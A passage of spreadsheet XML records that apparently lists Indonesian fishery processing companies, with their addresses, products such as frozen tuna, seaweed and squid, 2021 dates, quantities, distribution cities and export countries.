    <s v="Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Bawal, Rejung, Kakap)"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24856"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24857"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kerisi, Lencam, Layur, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="357000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24858"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerisi, Lencam, Layur, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="24859"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="12500"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="24860"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="21000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="24861"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="27500"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="24862"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="18500"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="24863"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="650"/>
    <s v="Kota Jakarta Barat, Kota Surabaya"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="24864"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Japan, United States"/>
  </r>
  <r>
    <n v="24865"/>
    <x v="1096"/>
    <s v="PT. SUKSES HASIL ALAM NUSAINDO"/>
    <s v="Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="240"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="24866"/>
    <x v="1090"/>
    <s v="CV. DSA BUANA KALIMANTAN"/>
    <s v="Jl. Banjar No.66 RT 27, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Lencam, Kerapu, Kakatua, Bawal, Kakap, Kuro, Kurisi)"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="36477"/>
    <s v="Kota Jakarta Barat"/>
    <s v="Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24885"/>
    <x v="801"/>
    <s v="NAVAR BAHARI RAYA"/>
    <s v="Dusun Bengkal RT 04 RW 04, Kel. Tanjungsari, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sambal Tuna"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kabupaten Pacitan, Kabupaten Ponorogo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24886"/>
    <x v="1097"/>
    <s v="PT. KEONG NUSANTARA ABADI"/>
    <s v="Jl. Raya Bogo - Kunjang RT 008 RW 001, Kel. Mojoayu, Kec. Plemahan, Kabupaten Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bekicot Kaleng"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="618000"/>
    <m/>
    <s v="Canada, Japan, United States"/>
  </r>
  <r>
    <n v="24887"/>
    <x v="1097"/>
    <s v="PT. KEONG NUSANTARA ABADI"/>
    <s v="Jl. Raya Bogo - Kunjang RT 008 RW 001, Kel. Mojoayu, Kec. Plemahan, Kabupaten Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bekicot Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="252000"/>
    <m/>
    <s v="Canada, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="24888"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="212000"/>
    <s v="Kota Denpasar"/>
    <s v="Australia, United States"/>
  </r>
  <r>
    <n v="24889"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="62000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24890"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="13000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24903"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24904"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24905"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Marlin, Cakalang, Tenggiri)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24906"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Marlin, Cakalang, Tenggiri)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24907"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Layur, Kakap Putih, Kuniran, Kerapu, Kakap, Kurisi)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24908"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Layur, Kakap Putih, Kuniran, Kerapu, Kakap, Kurisi)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24909"/>
    <x v="1098"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. Ikan Tuna Raya No.17, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24910"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24911"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Makassar"/>
    <s v="China, Hong Kong, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="24912"/>
    <x v="1099"/>
    <s v="PT. ARTI BUANA LAUTAN INDONESIA"/>
    <s v="Jl. Sabutung No.3, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Selar, Kembung, Layang, Tongkol, Cakalang, Tenggiri, Marlin, Layaran)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Makassar"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24913"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24914"/>
    <x v="1100"/>
    <s v="CV, PUTRI DAHLIA"/>
    <s v="Jl, Muara Baru No,01 RT 010 RW 017 (Room 4), Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Deho, Salem, Sarden, Layang, Lemuru, Tembang, Banjar, Cakalang)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="China, Hong Kong, Malaysia, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24921"/>
    <x v="1101"/>
    <s v="NGATA ANATA"/>
    <s v="BTN Palupi Blok BS 2 No.11, Kel. Palupi, Kec. Tatanga, Kota Palu&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Abon Ikan"/>
    <d v="2021-05-24T00:00:00"/>
    <n v="50"/>
    <s v="Kota Palu"/>
    <m/>
  </r>
  <r>
    <n v="24932"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24933"/>
    <x v="1022"/>
    <s v="CV. 3 BERKAT MURNI BARA"/>
    <s v="Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Makassar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24934"/>
    <x v="289"/>
    <s v="PT. SINAR GRAHA"/>
    <s v="Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Barramundi, Manyung, Kerapu, Kakap)"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="90000"/>
    <m/>
    <s v="Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="24936"/>
    <x v="514"/>
    <s v="CV. INDO JAYA PRATAMA"/>
    <s v="Dusun Krajan RT 005 RW 004, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-25T00:00:00"/>
    <n v="2400000"/>
    <s v="Kabupaten Bogor, Kota Surabaya"/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24937"/>
    <x v="1102"/>
    <s v="PT. RIYOUSA CIPTA INDONESIA"/>
    <s v="Jl. Daeng Tata Raya, Ruko Permata Mutiara Blok A 26-28, Kel. Parang Tambung, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Australia, Belarus, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Philippines, Russian Federation, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24938"/>
    <x v="1102"/>
    <s v="PT. RIYOUSA CIPTA INDONESIA"/>
    <s v="Jl. Daeng Tata Raya, Ruko Permata Mutiara Blok A26-28, Kel. Parang Tambung, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2021-05-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar"/>
    <s v="Belarus, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Russian Federation, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24945"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24946"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kabupaten Purbalingga, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24947"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24948"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24949"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24950"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24951"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24952"/>
    <x v="1103"/>
    <s v="CV. SURYA CEMERLANG ABADI"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room B1 &amp; C1), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24954"/>
    <x v="799"/>
    <s v="LEZZATO CAMILAN BEKU"/>
    <s v="Madulegi RT 04 RW 10, Kel. Plintahan, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cumi-cumi Bernilai Tambah Beku (Bakso Cumi-cumi, Pangsit Cumi-cumi, Martabak Cumi-cumi, Naget Cumi-cumi)"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="120"/>
    <s v="Kota Semarang, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Pasuruan"/>
    <m/>
  </r>
  <r>
    <n v="24955"/>
    <x v="246"/>
    <s v="PT. SIGER JAYA SENTOSA"/>
    <s v="Jl. Raya Tanjung Bintang No.101, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Kerang Rebus Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24956"/>
    <x v="1104"/>
    <s v="PT. MULTI PRIMA ABADI MAS"/>
    <s v="Komplek CBD Blok C1 No.11 RT 014 RW 007, Kel. Cengkareng Timur, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-05-27T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24957"/>
    <x v="1105"/>
    <s v="PT. RAHMAT BAHARI INDONESIA"/>
    <s v="Jl. Kima 14 No.F2 SS3, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="21600000"/>
    <m/>
    <s v="China, France, Korea, Republic of, United States"/>
  </r>
  <r>
    <n v="24961"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Berlapis Tepung Beku"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Purwakarta, Kota Bandung, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24962"/>
    <x v="1007"/>
    <s v="PT. KURNIA MITRA MAKMUR PURWAKARTA"/>
    <s v="Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Otak-otak Ikan, Naget, Siomay, Kue Ikan) "/>
    <d v="2021-04-05T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Purwakarta, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24966"/>
    <x v="1106"/>
    <s v="PT. KENCANA BUMI SUKSES"/>
    <s v="Pulau Nipah Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="130000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24967"/>
    <x v="1107"/>
    <s v="PT. SOEJASCH BALI"/>
    <s v="Jl. Gunung Patas No.1, Kel. Padang Sambian Kelod, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Salmon Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="12000"/>
